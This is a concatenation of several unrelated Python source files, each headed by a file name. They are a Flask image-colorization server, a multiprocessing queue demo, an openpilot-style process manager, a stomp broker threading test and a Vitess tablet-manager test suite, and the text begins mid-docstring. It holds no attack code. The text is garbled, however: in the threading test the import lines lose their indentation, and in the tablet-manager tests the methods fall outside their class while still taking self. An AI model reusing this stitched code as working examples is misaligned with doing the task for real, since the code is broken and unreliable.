    file:     uploaded werkzeug FileStorage (has .content_type).
    labArr:   flattened Lab color triple; only the a/b channels are used.
    position: [row, col] location of the color hint on the 256x256 grid.
    Returns a BytesIO with the encoded result, or the string "error".
    """
    ext = file.content_type.split("/")[-1]
    # BUG FIX: the temp path used a fixed literal name, so concurrent requests
    # clobbered each other's files; use the generated UUID per request.
    tempFilePath = f'./input/{uuid.uuid1()}.{ext}'
    try:
        image = Image.open(file)
        image = image.resize([256, 256])
        image.save(tempFilePath)
        colorModel.load_image(tempFilePath)
        inputAb = np.zeros((2, 256, 256))
        mask = np.zeros((1, 256, 256))
        (inputAb, mask) = put_point(inputAb, mask, position, 3, [labArr[1], labArr[2]])
        colorModel.net_forward(inputAb, mask)
        imgOutFullRes = colorModel.get_img_fullres()
        pilImage = Image.fromarray(np.uint8(imgOutFullRes)).convert('RGB')
        result = BytesIO()
        pilImage.save(result, format=ext)
        result.seek(0)
        return result
    except Exception:
        # Sentinel checked by the route handler; maps to HTTP 500.
        return "error"
    finally:
        # BUG FIX: the temp file used to leak whenever an exception occurred
        # before os.remove(); clean it up on every path.
        if os.path.exists(tempFilePath):
            os.remove(tempFilePath)
@app.route('/ideepcolor', methods=['POST'])
def ideepcolor():
    """Colorization endpoint: accepts an image, a hint color and a position."""
    # Simple backpressure: reject when the worker queue is already backed up.
    if requestsQueue.qsize() > BATCH_SIZE:
        return Response('Too Many Requests', status=429)
    try:
        file = request.files['image']
        color = request.form['color']
        positionX = request.form['positionX']
        positionY = request.form['positionY']
    except:
        return Response("Bad Request", status=400)
    # Convert the CSS-style color to Lab; the model consumes the a/b channels.
    rgbArray = ImageColor.getrgb(color)
    rgbNumpyArr = np.array((rgbArray[0], rgbArray[1], rgbArray[2])).astype('uint8')
    labArr = skiColor.rgb2lab(rgbNumpyArr[np.newaxis, np.newaxis, :]).flatten()
    # Model indexing is [row, col], i.e. (y, x).
    position = [int(positionY), int(positionX)]
    req = {
        'input': [file, labArr, position]
    }
    requestsQueue.put(req)
    # Poll until the background worker fills in 'output'.
    # NOTE(review): there is no timeout here - a wedged worker would make this
    # request hang forever; consider bounding the wait.
    while 'output' not in req:
        time.sleep(CHECK_INTERVAL)
    io = req['output']
    if io == "error":
        return Response('Server Error', status=500)
    return send_file(io, mimetype=f'image/{file.content_type.split("/")[-1]}')
@app.route('/test_imgs/<file_path>')
def get_test_image(file_path: str):
    """Serve a sample image from ./test_imgs.

    The default <file_path> converter does not match '/', but reject any
    residual traversal components defensively before concatenating the path.
    """
    if '..' in file_path or file_path.startswith(('/', '\\')):
        return Response('Not Found', status=404)
    return send_file('./test_imgs/' + file_path)
@app.route('/', methods=['GET'])
def main():
    """Render the interactive colorization landing page."""
    return render_template('index.html')
@app.route('/healthz', methods=['GET'])
def healthz():
    """Liveness probe endpoint; always responds with a plain 'ok'."""
    return 'ok'
if __name__ == "__main__":
    # Listen on all interfaces; Flask accepts the port as a string here.
    app.run(host="0.0.0.0", port="5000")
2.Multiprocessing.Queue.py | # -*- coding: utf-8 -*-
import multiprocessing
def writer_proc(q):
    """Put a single sentinel value (1) on the queue.

    Errors (e.g. queue.Full with a bounded, non-blocking put) are swallowed
    so the demo process always exits cleanly.
    """
    try:
        # q.put(1, block=False) would raise queue.Full on a full bounded queue.
        q.put(1)
    except Exception:
        # BUG FIX: was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit.
        pass
def reader_proc(q):
    """Read one value from the queue and print it.

    BUG FIX: `print x` was Python 2 syntax and is a SyntaxError on Python 3;
    the rest of the file runs unchanged on Python 3.
    """
    try:
        # x = q.get(block=False) would raise queue.Empty when nothing is queued.
        x = q.get()
        print(x)
    except Exception:
        # BUG FIX: narrowed from a bare `except:` (which also swallowed
        # KeyboardInterrupt/SystemExit).
        pass
if __name__ == "__main__":
    # A multiprocessing.Queue is process-safe; one writer and one reader
    # process exchange a single value through it.
    q = multiprocessing.Queue()
    writer = multiprocessing.Process(target=writer_proc, args=(q,))
    writer.start()
    reader = multiprocessing.Process(target=reader_proc, args=(q,))
    reader.start()
    # Wait for both children before exiting the parent.
    reader.join()
    writer.join()
manager.py | #!/usr/bin/env python3
import datetime
import os
import signal
import subprocess
import sys
import traceback
from multiprocessing import Process
from typing import List, Tuple, Union
import cereal.messaging as messaging
import selfdrive.sentry as sentry
from common.basedir import BASEDIR
from common.params import Params, ParamKeyType
from common.text_window import TextWindow
from selfdrive.boardd.set_time import set_time
from selfdrive.hardware import HARDWARE, PC, EON
from selfdrive.manager.helpers import unblock_stdout
from selfdrive.manager.process import ensure_running, launcher
from selfdrive.manager.process_config import managed_processes
from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID
from selfdrive.swaglog import cloudlog, add_file_handler
from selfdrive.version import is_dirty, get_commit, get_version, get_origin, get_short_branch, \
terms_version, training_version
from selfdrive.hardware.eon.apk import system
sys.path.append(os.path.join(BASEDIR, "pyextra"))
def manager_init() -> None:
  """One-time startup: clock sync, param defaults, version info, registration,
  and cloud logging setup. Raises if device registration fails."""
  # update system time from panda
  set_time(cloudlog)
  # save boot log
  #subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
  params = Params()
  params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START)
  # Defaults applied only for params that are currently unset (see loop below).
  default_params: List[Tuple[str, Union[str, bytes]]] = [
    ("CompletedTrainingVersion", "0"),
    ("HasAcceptedTerms", "0"),
    ("OpenpilotEnabledToggle", "1"),
    ("IsMetric", "1"),
    # HKG
    ("UseClusterSpeed", "0"),
    ("LongControlEnabled", "0"),
    ("MadModeEnabled", "1"),
    ("IsLdwsCar", "0"),
    ("LaneChangeEnabled", "0"),
    ("AutoLaneChangeEnabled", "0"),
    ("SccSmootherSlowOnCurves", "0"),
    ("SccSmootherSyncGasPressed", "0"),
    ("StockNaviDecelEnabled", "0"),
    ("KeepSteeringTurnSignals", "0"),
    ("HapticFeedbackWhenSpeedCamera", "0"),
    ("DisableOpFcw", "0"),
    ("ShowDebugUI", "0"),
    ("NewRadarInterface", "0"),
    ("IsOpenpilotViewEnabled", "0"),
  ]
  if not PC:
    default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')))
  if params.get_bool("RecordFrontLock"):
    params.put_bool("RecordFront", True)
  if not params.get_bool("DisableRadar_Allow"):
    params.delete("DisableRadar")
  # set unset params
  for k, v in default_params:
    if params.get(k) is None:
      params.put(k, v)
  # is this dashcam?
  if os.getenv("PASSIVE") is not None:
    params.put_bool("Passive", bool(int(os.getenv("PASSIVE", "0"))))
  if params.get("Passive") is None:
    raise Exception("Passive must be set to continue")
  # Create folders needed for msgq
  try:
    os.mkdir("/dev/shm")
  except FileExistsError:
    pass
  except PermissionError:
    print("WARNING: failed to make /dev/shm")
  # set version params
  params.put("Version", get_version())
  params.put("TermsVersion", terms_version)
  params.put("TrainingVersion", training_version)
  params.put("GitCommit", get_commit(default=""))
  params.put("GitBranch", get_short_branch(default=""))
  params.put("GitRemote", get_origin(default=""))
  # set dongle id
  reg_res = register(show_spinner=True)
  if reg_res:
    dongle_id = reg_res
  else:
    serial = params.get("HardwareSerial")
    raise Exception(f"Registration failed for device {serial}")
  os.environ['DONGLE_ID'] = dongle_id  # Needed for swaglog
  if not is_dirty():
    os.environ['CLEAN'] = '1'
  # init logging
  sentry.init(sentry.SentryProject.SELFDRIVE)
  cloudlog.bind_global(dongle_id=dongle_id, version=get_version(), dirty=is_dirty(),
                       device=HARDWARE.get_device_type())
def manager_prepare() -> None:
  """Run the prepare step for every managed process."""
  for proc in managed_processes.values():
    proc.prepare()
def manager_cleanup() -> None:
  """Stop all managed processes: signal everything first, then wait on each."""
  # send signals to kill all procs
  for p in managed_processes.values():
    p.stop(block=False)
  # ensure all are killed
  for p in managed_processes.values():
    p.stop(block=True)
  cloudlog.info("everything is dead")
def manager_thread() -> None:
  """Main supervision loop: keep managed processes in the desired state and
  publish managerState until an uninstall/shutdown/reboot param is set."""
  if EON:
    # EON-only daemons and the companion Android service.
    Process(name="autoshutdownd", target=launcher, args=("selfdrive.autoshutdownd", "autoshutdownd")).start()
    system("am startservice com.neokii.optool/.MainService")
  Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter", "road_speed_limiter")).start()
  cloudlog.bind(daemon="manager")
  cloudlog.info("manager start")
  cloudlog.info({"environ": os.environ})
  params = Params()
  # Processes that should never be (re)started in this session.
  ignore: List[str] = []
  if params.get("DongleId", encoding='utf8') in (None, UNREGISTERED_DONGLE_ID):
    ignore += ["manage_athenad", "uploader"]
  if os.getenv("NOBOARD") is not None:
    ignore.append("pandad")
  ignore += [x for x in os.getenv("BLOCK", "").split(",") if len(x) > 0]
  ensure_running(managed_processes.values(), started=False, not_run=ignore)
  started_prev = False
  sm = messaging.SubMaster(['deviceState'])
  pm = messaging.PubMaster(['managerState'])
  while True:
    sm.update()
    not_run = ignore[:]
    started = sm['deviceState'].started
    driverview = params.get_bool("IsDriverViewEnabled")
    ensure_running(managed_processes.values(), started, driverview, not_run)
    # trigger an update after going offroad
    if started_prev and not started and 'updated' in managed_processes:
      os.sync()
      managed_processes['updated'].signal(signal.SIGHUP)
    started_prev = started
    # Green/red ANSI-colored status line of all managed processes.
    running = ' '.join("%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name)
                       for p in managed_processes.values() if p.proc)
    print(running)
    cloudlog.debug(running)
    # send managerState
    msg = messaging.new_message('managerState')
    msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()]
    pm.send('managerState', msg)
    # Exit main loop when uninstall/shutdown/reboot is needed
    shutdown = False
    for param in ("DoUninstall", "DoShutdown", "DoReboot"):
      if params.get_bool(param):
        shutdown = True
        params.put("LastManagerExitReason", param)
        cloudlog.warning(f"Shutting down manager - {param} set")
    if shutdown:
      break
def main() -> None:
  """Entry point: init, run the supervision loop, then clean up and act on
  any uninstall/reboot/shutdown request that ended the loop."""
  prepare_only = os.getenv("PREPAREONLY") is not None
  manager_init()
  # Start UI early so prepare can happen in the background
  if not prepare_only:
    managed_processes['ui'].start()
  manager_prepare()
  if prepare_only:
    return
  # SystemExit on sigterm
  signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
  try:
    manager_thread()
  except Exception:
    traceback.print_exc()
    sentry.capture_exception()
  finally:
    # Always stop children, even if the loop crashed.
    manager_cleanup()
  params = Params()
  if params.get_bool("DoUninstall"):
    cloudlog.warning("uninstalling")
    HARDWARE.uninstall()
  elif params.get_bool("DoReboot"):
    cloudlog.warning("reboot")
    HARDWARE.reboot()
  elif params.get_bool("DoShutdown"):
    cloudlog.warning("shutdown")
    HARDWARE.shutdown()
if __name__ == "__main__":
  unblock_stdout()
  try:
    main()
  except Exception:
    # Startup failed: persist the log, stop the UI, and show the traceback
    # on-screen before re-raising.
    add_file_handler(cloudlog)
    cloudlog.exception("Manager failed to start")
    try:
      managed_processes['ui'].stop()
    except Exception:
      pass
    # Show last 3 lines of traceback
    error = traceback.format_exc(-3)
    error = "Manager failed to start\n\n" + error
    with TextWindow(error) as t:
      t.wait_for_exit()
    raise
  # manual exit because we are forked
  sys.exit(0)
|
threading_test.py | try:
from queue import Empty, Full, Queue
except ImportError:
from Queue import Empty, Full, Queue
import sys
import threading
import time
import unittest
import stomp
from stomp.backward import monotonic
from stomp.test.testutils import *
class MQ(object):
    """Thin wrapper around a single shared stomp broker connection."""
    def __init__(self):
        self.connection = stomp.Connection(get_default_host())
        self.connection.set_listener('', None)
        self.connection.start()
        self.connection.connect('admin', 'password', wait=True)
    def send(self, topic, msg, persistent='true', retry=False):
        # NOTE(review): `retry` is accepted but never used - confirm whether
        # callers rely on it before removing.
        self.connection.send(destination="/topic/%s" % topic, body=msg,
                             persistent=persistent)
mq = MQ()
class TestThreading(unittest.TestCase):
    def setUp(self):
        """Test that mq sends don't wedge their threads.

        Starts a number of sender threads, and runs for a set amount of
        time. Each thread sends messages as fast as it can, and after each
        send, pops from a Queue. Meanwhile, the Queue is filled with one
        marker per second. If the Queue fills, the test fails, as that
        indicates that all threads are no longer emptying the queue, and thus
        must be wedged in their send() calls.
        """
        self.Q = Queue(10)
        self.Cmd = Queue()
        self.Error = Queue()
        self.clients = 20
        self.threads = []
        self.runfor = 20
        for i in range(0, self.clients):
            t = threading.Thread(name="client %s" % i,
                                 target=self.make_sender(i))
            # FIX: setDaemon(1) is deprecated; use the daemon attribute.
            t.daemon = True
            self.threads.append(t)
    def tearDown(self):
        """Stop all sender threads and report any that died with an error."""
        for t in self.threads:
            # BUG FIX: `if not t.isAlive` tested the bound method object,
            # which is always truthy, so dead threads were never reported.
            if not t.is_alive():
                print("thread", t, "died")
        # One 'stop' command per client thread.
        self.Cmd.put('stop')
        for t in self.threads:
            t.join()
        print()
        print()
        # Drain and summarize the error queue by exception type.
        errs = []
        while 1:
            try:
                errs.append(self.Error.get(block=False))
            except Empty:
                break
        print("Dead threads:", len(errs), "of", self.clients)
        etype = {}
        for ec, _, _ in errs:
            if ec in etype:
                etype[ec] += 1
            else:
                etype[ec] = 1
        for k in sorted(etype.keys()):
            print("%s: %s" % (k, etype[k]))
        mq.connection.disconnect()
    def make_sender(self, i):
        """Build the per-thread send loop closure for client number i."""
        Q = self.Q
        Cmd = self.Cmd
        Error = self.Error
        def send(i=i, Q=Q, Cmd=Cmd, Error=Error):
            counter = 0
            print("%s starting" % i)
            try:
                while 1:
                    # print "%s sending %s" % (i, counter)
                    try:
                        mq.send('testclientwedge',
                                'Message %s:%s' % (i, counter))
                    except:
                        # Record the failure for tearDown's summary.
                        Error.put(sys.exc_info())
                        # thread will die
                        raise
                    else:
                        # print "%s sent %s" % (i, counter)
                        try:
                            Q.get(block=False)
                        except Empty:
                            pass
                        try:
                            if Cmd.get(block=False):
                                break
                        except Empty:
                            pass
                        counter += 1
            finally:
                print("final", i, counter)
        return send
    def test_threads_dont_wedge(self):
        """Feed the marker queue for `runfor` seconds; a Full queue means all
        sender threads are wedged."""
        for t in self.threads:
            t.start()
        start = monotonic()
        while monotonic() - start < self.runfor:
            try:
                self.Q.put(1, False)
                time.sleep(1.0)
            except Full:
                assert False, "Failed: 'request' queue filled up"
        print("passed")
|
tabletmanager.py | #!/usr/bin/python
import warnings
# Dropping a table inexplicably produces a warning despite
# the "IF EXISTS" clause. Squelch these warnings.
warnings.simplefilter("ignore")
import logging
import os
import signal
from subprocess import PIPE
import threading
import time
import unittest
import urllib
import environment
import utils
import tablet
from vtdb import dbexceptions
from vtdb import vtgate
# Module-level fixtures: the two mysqld/vttablet pairs used by every test.
tablet_62344 = tablet.Tablet(62344)
tablet_62044 = tablet.Tablet(62044)
def setUpModule():
    """Bring up the topo server, both MySQL instances and vtctld once per module."""
    try:
        if environment.topo_server_implementation == 'zookeeper':
            # this is a one-off test to make sure our zookeeper implementation
            # behaves with a server that is not DNS-resolveable
            environment.topo_server_setup(add_bad_host=True)
        else:
            environment.topo_server_setup()
        # start mysql instance external to the test
        setup_procs = [
            tablet_62344.init_mysql(),
            tablet_62044.init_mysql(),
        ]
        utils.Vtctld().start()
        utils.wait_procs(setup_procs)
    except:
        # best-effort cleanup, then surface the original error
        tearDownModule()
        raise
def tearDownModule():
    """Tear down MySQL instances, topo server and temp state (unless skipped)."""
    if utils.options.skip_teardown:
        return
    teardown_procs = [
        tablet_62344.teardown_mysql(),
        tablet_62044.teardown_mysql(),
    ]
    # best effort: keep tearing down even if a proc fails
    utils.wait_procs(teardown_procs, raise_on_error=False)
    environment.topo_server_teardown()
    utils.kill_sub_processes()
    utils.remove_tmp_files()
    tablet_62344.remove_tree()
    tablet_62044.remove_tree()
class TestTabletManager(unittest.TestCase):
    """End-to-end tests for vttablet / vtctl tablet management."""

    def tearDown(self):
        """Per-test cleanup: check for stray vttablets, wipe topo, reset tablets."""
        tablet.Tablet.check_vttablet_count()
        environment.topo_server_wipe()
        for t in [tablet_62344, tablet_62044]:
            t.reset_replication()
            t.clean_dbs()
# run twice to check behavior with existing znode data
def test_sanity(self):
    """Run the sanity scenario twice; the second pass hits pre-existing topo data."""
    self._test_sanity()
    self._test_sanity()
def _test_sanity(self):
    """Full tablet lifecycle: init master, serve queries, demote, scrap."""
    # Start up a master mysql and vttablet
    utils.run_vtctl(['CreateKeyspace', '-force', 'test_keyspace'])
    utils.run_vtctl(['createshard', '-force', 'test_keyspace/0'])
    tablet_62344.init_tablet('master', 'test_keyspace', '0', parent=False)
    utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'])
    utils.validate_topology()
    srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj', 'test_keyspace/0'])
    self.assertEqual(srvShard['MasterCell'], 'test_nj')
    # if these statements don't run before the tablet it will wedge waiting for the
    # db to become accessible. this is more a bug than a feature.
    tablet_62344.populate('vt_test_keyspace', self._create_vt_select_test,
                          self._populate_vt_select_test)
    tablet_62344.start_vttablet()
    # make sure the query service is started right away
    result, _ = utils.run_vtctl(['Query', 'test_nj', 'test_keyspace',
                                 'select * from vt_select_test'],
                                mode=utils.VTCTL_VTCTL, trap_output=True)
    rows = result.splitlines()
    # 5 lines = presumably a header line plus the 4 populated rows
    self.assertEqual(len(rows), 5, "expected 5 rows in vt_select_test: %s %s" % (str(rows), result))
    # make sure direct dba queries work
    query_result = utils.run_vtctl_json(['ExecuteFetch', '-want_fields', tablet_62344.tablet_alias, 'select * from vt_test_keyspace.vt_select_test'])
    self.assertEqual(len(query_result['Rows']), 4, "expected 4 rows in vt_select_test: %s" % str(query_result))
    self.assertEqual(len(query_result['Fields']), 2, "expected 2 fields in vt_select_test: %s" % str(query_result))
    # check Pings
    utils.run_vtctl(['Ping', tablet_62344.tablet_alias])
    utils.run_vtctl(['RpcPing', tablet_62344.tablet_alias])
    # Quickly check basic actions.
    utils.run_vtctl(['SetReadOnly', tablet_62344.tablet_alias])
    utils.wait_db_read_only(62344)
    utils.run_vtctl(['SetReadWrite', tablet_62344.tablet_alias])
    utils.check_db_read_write(62344)
    utils.run_vtctl(['DemoteMaster', tablet_62344.tablet_alias])
    utils.wait_db_read_only(62344)
    utils.validate_topology()
    utils.run_vtctl(['ValidateKeyspace', 'test_keyspace'])
    # not pinging tablets, as it enables replication checks, and they
    # break because we only have a single master, no slaves
    utils.run_vtctl(['ValidateShard', '-ping-tablets=false', 'test_keyspace/0'])
    srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj', 'test_keyspace/0'])
    self.assertEqual(srvShard['MasterCell'], 'test_nj')
    tablet_62344.kill_vttablet()
    tablet_62344.init_tablet('idle')
    tablet_62344.scrap(force=True)
def test_vtgate(self):
    """Exercise the vtgate client: execute, batch, stream, txns, interleaving."""
    # Start up a master mysql and vttablet
    utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
    utils.run_vtctl(['CreateShard', 'test_keyspace/0'])
    tablet_62344.init_tablet('master', 'test_keyspace', '0', parent=False)
    utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'])
    utils.validate_topology()
    srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj',
                                     'test_keyspace/0'])
    self.assertEqual(srvShard['MasterCell'], 'test_nj')
    # if these statements don't run before the tablet it will wedge waiting for the
    # db to become accessible. this is more a bug than a feature.
    tablet_62344.mquery("", ["set global read_only = off"])
    tablet_62344.populate('vt_test_keyspace', self._create_vt_select_test,
                          self._populate_vt_select_test)
    tablet_62344.start_vttablet()
    gate_proc, gate_port = utils.vtgate_start()
    conn = vtgate.connect("localhost:%s"%(gate_port), "master", "test_keyspace",
                          "0", 2.0)
    # _execute
    (result, count, lastrow, fields) = conn._execute("select * from vt_select_test", {})
    self.assertEqual(count, 4, "want 4, got %d" % (count))
    self.assertEqual(len(fields), 2, "want 2, got %d" % (len(fields)))
    # _execute_batch
    queries = [
        "select * from vt_select_test where id = :id",
        "select * from vt_select_test where id = :id",
        ]
    bindvars = [
        {"id": 1},
        {"id": 2},
        ]
    rowsets = conn._execute_batch(queries, bindvars)
    self.assertEqual(rowsets[0][0][0][0], 1)
    self.assertEqual(rowsets[1][0][0][0], 2)
    # _stream_execute
    (result, count, lastrow, fields) = conn._stream_execute("select * from vt_select_test", {})
    self.assertEqual(len(fields), 2, "want 2, got %d" % (len(fields)))
    count = 0
    while 1:
        r = conn._stream_next()
        if not r:
            break
        count += 1
    self.assertEqual(count, 4, "want 4, got %d" % (count))
    # begin-rollback
    conn.begin()
    conn._execute("insert into vt_select_test values(:id, :msg)", {"id": 5, "msg": "test4"})
    conn.rollback()
    (result, count, lastrow, fields) = conn._execute("select * from vt_select_test", {})
    self.assertEqual(count, 4, "want 4, got %d" % (count))
    # begin-commit
    conn.begin()
    conn._execute("insert into vt_select_test values(:id, :msg)", {"id": 5, "msg": "test4"})
    conn.commit()
    (result, count, lastrow, fields) = conn._execute("select * from vt_select_test", {})
    self.assertEqual(count, 5, "want 5, got %d" % (count))
    # error on dml. We still need to get a transaction id
    conn.begin()
    with self.assertRaises(dbexceptions.IntegrityError):
        conn._execute("insert into vt_select_test values(:id, :msg)", {"id": 5, "msg": "test4"})
    self.assertTrue(conn.session["ShardSessions"][0]["TransactionId"] != 0)
    conn.commit()
    # interleaving: a second connection hammers queries from another thread
    conn2 = vtgate.connect("localhost:%s"%(gate_port), "master",
                           "test_keyspace", "0", 2.0)
    thd = threading.Thread(target=self._query_lots, args=(conn2,))
    thd.start()
    for i in xrange(250):
        (result, count, lastrow, fields) = conn._execute("select id from vt_select_test where id = 2", {})
        self.assertEqual(result, [(2,)])
        if i % 10 == 0:
            conn._stream_execute("select id from vt_select_test where id = 3", {})
            while 1:
                result = conn._stream_next()
                if not result:
                    break
                self.assertEqual(result, (3,))
    thd.join()
    # close
    conn.close()
    utils.vtgate_kill(gate_proc)
    tablet_62344.kill_vttablet()
def _query_lots(self, conn2):
    """Background worker for test_vtgate: hammer vtgate with point queries."""
    for i in xrange(500):
        (result, count, lastrow, fields) = conn2._execute("select id from vt_select_test where id = 1", {})
        self.assertEqual(result, [(1,)])
def test_scrap(self):
    """Scrapping a replica must leave the shard serving graph intact."""
    # Start up a master mysql and vttablet
    utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
    tablet_62344.init_tablet('master', 'test_keyspace', '0')
    tablet_62044.init_tablet('replica', 'test_keyspace', '0')
    utils.run_vtctl(['RebuildShardGraph', 'test_keyspace/*'])
    utils.validate_topology()
    srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj',
                                     'test_keyspace/0'])
    self.assertEqual(srvShard['MasterCell'], 'test_nj')
    tablet_62044.scrap(force=True)
    utils.validate_topology()
    # master cell must be unchanged after the replica was scrapped
    srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj',
                                     'test_keyspace/0'])
    self.assertEqual(srvShard['MasterCell'], 'test_nj')
# Schema and fixture data shared by the query-serving tests.
_create_vt_select_test = '''create table vt_select_test (
id bigint auto_increment,
msg varchar(64),
primary key (id)
) Engine=InnoDB'''
# 4 rows; ids 1..4 are assigned by auto_increment
_populate_vt_select_test = [
    "insert into vt_select_test (msg) values ('test %s')" % x
    for x in xrange(4)]
def test_restart_during_action(self):
    """Restarting the agent must not lose or clobber a running vtaction."""
    # Start up a master mysql and vttablet
    utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
    tablet_62344.init_tablet('master', 'test_keyspace', '0')
    utils.run_vtctl(['RebuildShardGraph', 'test_keyspace/0'])
    utils.validate_topology()
    srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj',
                                     'test_keyspace/0'])
    self.assertEqual(srvShard['MasterCell'], 'test_nj')
    tablet_62344.create_db('vt_test_keyspace')
    tablet_62344.start_vttablet()
    utils.run_vtctl(['Ping', tablet_62344.tablet_alias])
    # schedule long action
    utils.run_vtctl(['-no-wait', 'Sleep', tablet_62344.tablet_alias, '15s'],
                    mode=utils.VTCTL_VTCTL, stdout=utils.devnull)
    # ping blocks until the sleep finishes unless we have a schedule race
    action_path, _ = utils.run_vtctl(['-no-wait', 'Ping',
                                      tablet_62344.tablet_alias],
                                     mode=utils.VTCTL_VTCTL, trap_output=True)
    action_path = action_path.strip()
    # kill agent leaving vtaction running
    tablet_62344.kill_vttablet()
    # restart agent
    tablet_62344.start_vttablet()
    # we expect this action with a short wait time to fail. this isn't the best
    # and has some potential for flakiness.
    utils.run_vtctl(['-wait-time', '2s', 'WaitForAction', action_path],
                    mode=utils.VTCTL_VTCTL, expect_fail=True)
    # wait until the background sleep action is done, otherwise there will be
    # a leftover vtaction whose result may overwrite running actions
    # NOTE(alainjobart): Yes, I've seen it happen, it's a pain to debug:
    # the zombie Sleep clobbers the Clone command in the following tests
    utils.run_vtctl(['-wait-time', '20s', 'WaitForAction', action_path],
                    mode=utils.VTCTL_VTCTL, auto_log=True)
    if environment.topo_server_implementation == 'zookeeper':
        # extra small test: we ran for a while, get the states we were in,
        # make sure they're accounted for properly
        # first the query engine States
        v = utils.get_vars(tablet_62344.port)
        logging.debug("vars: %s" % str(v))
        # then the Zookeeper connections
        if v['ZkMetaConn']['test_nj']['Current'] != 'Connected':
            self.fail('invalid zk test_nj state: %s' %
                      v['ZkMetaConn']['test_nj']['Current'])
        if v['ZkMetaConn']['global']['Current'] != 'Connected':
            self.fail('invalid zk global state: %s' %
                      v['ZkMetaConn']['global']['Current'])
        if v['ZkMetaConn']['test_nj']['DurationConnected'] < 10e9:
            self.fail('not enough time in Connected state: %u',
                      v['ZkMetaConn']['test_nj']['DurationConnected'])
        if v['TabletType'] != 'master':
            self.fail('TabletType not exported correctly')
    tablet_62344.kill_vttablet()
def test_vttablet_authenticated(self):
    """Authenticated vquery must serve results for a valid user/password."""
    utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
    tablet_62344.init_tablet('master', 'test_keyspace', '0')
    utils.run_vtctl(['RebuildShardGraph', 'test_keyspace/0'])
    utils.validate_topology()
    srvShard = utils.run_vtctl_json(['GetSrvShard', 'test_nj', 'test_keyspace/0'])
    self.assertEqual(srvShard['MasterCell'], 'test_nj')
    tablet_62344.populate('vt_test_keyspace', self._create_vt_select_test,
                          self._populate_vt_select_test)
    tablet_62344.start_vttablet(auth=True)
    utils.run_vtctl(['SetReadWrite', tablet_62344.tablet_alias])
    out, err = tablet_62344.vquery('select * from vt_select_test',
                                   path='test_keyspace/0', verbose=True,
                                   user='ala', password=r'ma kota')
    logging.debug("Got rows: " + err)
    if 'Row count: 4' not in err:
        self.fail("query didn't go through: %s, %s" % (err, out))
    tablet_62344.kill_vttablet()
    # TODO(szopa): Test that non-authenticated queries do not pass
    # through (when we get to that point).
def _check_string_in_hook_result(self, text, expected):
    """Assert *text* contains at least one of *expected* (a string or list of strings)."""
    if isinstance(expected, basestring):
        expected = [expected]
    for exp in expected:
        if exp in text:
            return
    # none matched: dump the output for debugging, then fail
    logging.warning("ExecuteHook output:\n%s", text)
    self.fail("ExecuteHook returned unexpected result, no string: '" + "', '".join(expected) + "'")
def _run_hook(self, params, expectedStrings):
    """Run vtctl ExecuteHook with *params*; check stderr for each expected string."""
    out, err = utils.run_vtctl(['--alsologtostderr', 'ExecuteHook',
                                tablet_62344.tablet_alias] + params,
                               mode=utils.VTCTL_VTCTL, trap_output=True,
                               raise_on_error=False)
    for expected in expectedStrings:
        self._check_string_in_hook_result(err, expected)
def test_hook(self):
    """ExecuteHook: stdout/stderr capture, exit codes, missing and invalid hooks."""
    utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
    # create the database so vttablets start, as it is serving
    tablet_62344.create_db('vt_test_keyspace')
    tablet_62344.init_tablet('master', 'test_keyspace', '0', start=True)
    # test a regular program works
    self._run_hook(['test.sh', '--flag1', '--param1=hello'], [
        '"ExitStatus": 0',
        # accept either PARAM ordering in the hook's stdout
        ['"Stdout": "TABLET_ALIAS: test_nj-0000062344\\nPARAM: --flag1\\nPARAM: --param1=hello\\n"',
         '"Stdout": "TABLET_ALIAS: test_nj-0000062344\\nPARAM: --param1=hello\\nPARAM: --flag1\\n"',
         ],
        '"Stderr": ""',
        ])
    # test stderr output
    self._run_hook(['test.sh', '--to-stderr'], [
        '"ExitStatus": 0',
        '"Stdout": "TABLET_ALIAS: test_nj-0000062344\\nPARAM: --to-stderr\\n"',
        '"Stderr": "ERR: --to-stderr\\n"',
        ])
    # test commands that fail
    self._run_hook(['test.sh', '--exit-error'], [
        '"ExitStatus": 1',
        '"Stdout": "TABLET_ALIAS: test_nj-0000062344\\nPARAM: --exit-error\\n"',
        '"Stderr": "ERROR: exit status 1\\n"',
        ])
    # test hook that is not present
    self._run_hook(['not_here.sh'], [
        '"ExitStatus": -1',
        '"Stdout": "Skipping missing hook: /',  # cannot go further, local path
        '"Stderr": ""',
        ])
    # test hook with invalid name
    self._run_hook(['/bin/ls'], [
        "action failed: ExecuteHook hook name cannot have a '/' in it",
        ])
    tablet_62344.kill_vttablet()
def test_sigterm(self):
    """SIGTERM to a running vtaction must surface a clean 'interrupted' error."""
    utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
    # create the database so vttablets start, as it is serving
    tablet_62344.create_db('vt_test_keyspace')
    tablet_62344.init_tablet('master', 'test_keyspace', '0', start=True)
    # start a 'vtctl Sleep' command, don't wait for it
    action_path, _ = utils.run_vtctl(['-no-wait', 'Sleep',
                                      tablet_62344.tablet_alias, '60s'],
                                     mode=utils.VTCTL_VTCTL, trap_output=True)
    action_path = action_path.strip()
    # wait for the action to be 'Running', capture its pid
    timeout = 10
    while True:
        an = utils.run_vtctl_json(['ReadTabletAction', action_path])
        if an.get('State', None) == 'Running':
            pid = an['Pid']
            logging.debug("Action is running with pid %u, good", pid)
            break
        timeout = utils.wait_step('sleep action to run', timeout)
